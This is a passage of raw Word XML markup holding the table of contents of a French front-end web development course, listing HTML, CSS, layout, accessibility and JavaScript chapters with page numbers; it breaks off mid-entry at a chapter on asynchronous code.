        <w:t>Les schémas sont des illustrations originales produites pour cette édition. Les extraits de code sont volontairement courts et commentés : ils servent de modèle, pas de bibliothèque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Sommaire général</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le sommaire présente les deux cours, leurs parties et leurs chapitres. Les numéros de page renvoient à la pagination continue du volume ; ils se mettent à jour avec le champ automatique (F9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="20" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText w:space="preserve"> TOC \o "1-2" \t "Titre de partie,1" \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Mentions légales et crédits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>À propos de cette édition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sommaire général</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Comment utiliser ce document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Plan de la collection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Parcours de progression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Conventions, pictogrammes et sources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Développement web front-end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie I — Les fondations du Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Comment fonctionne le Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Installer et maîtriser son environnement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. La structure d'un document HTML5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Texte, listes et sémantique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Liens et navigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>66</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. Images, vidéos et audio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>74</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7. Tableaux de données</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8. Formulaires HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>92</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie II — CSS : mise en forme et design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>9. Premiers pas en CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>10. Sélecteurs, variables et unités</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>11. Typographie web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>12. Couleurs, fonds et contrastes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>13. Le modèle de boîte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>138</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>14. Bordures, ombres et profondeur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>147</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>15. Composants d'interface et états</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>16. Transitions et animations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>163</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie III — Mise en page moderne et accessibilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>171</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>17. Architecture CSS et conception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>171</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>18. Flexbox : aligner sur un axe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>180</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>19. CSS Grid : structurer la page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>188</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>20. Positionnement et couches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>196</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>21. Design responsive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>22. Unités fluides et rythme vertical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>211</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>23. Accessibilité web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>218</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie IV — JavaScript et interactivité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>226</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>24. Introduction à JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>226</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>25. Fonctions, tableaux et objets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>26. Le DOM et la manipulation de la page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>241</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>27. Événements et interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>250</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>28. Formulaires et validation côté client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>258</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">29. Asynchrone : promesses et </w:t>
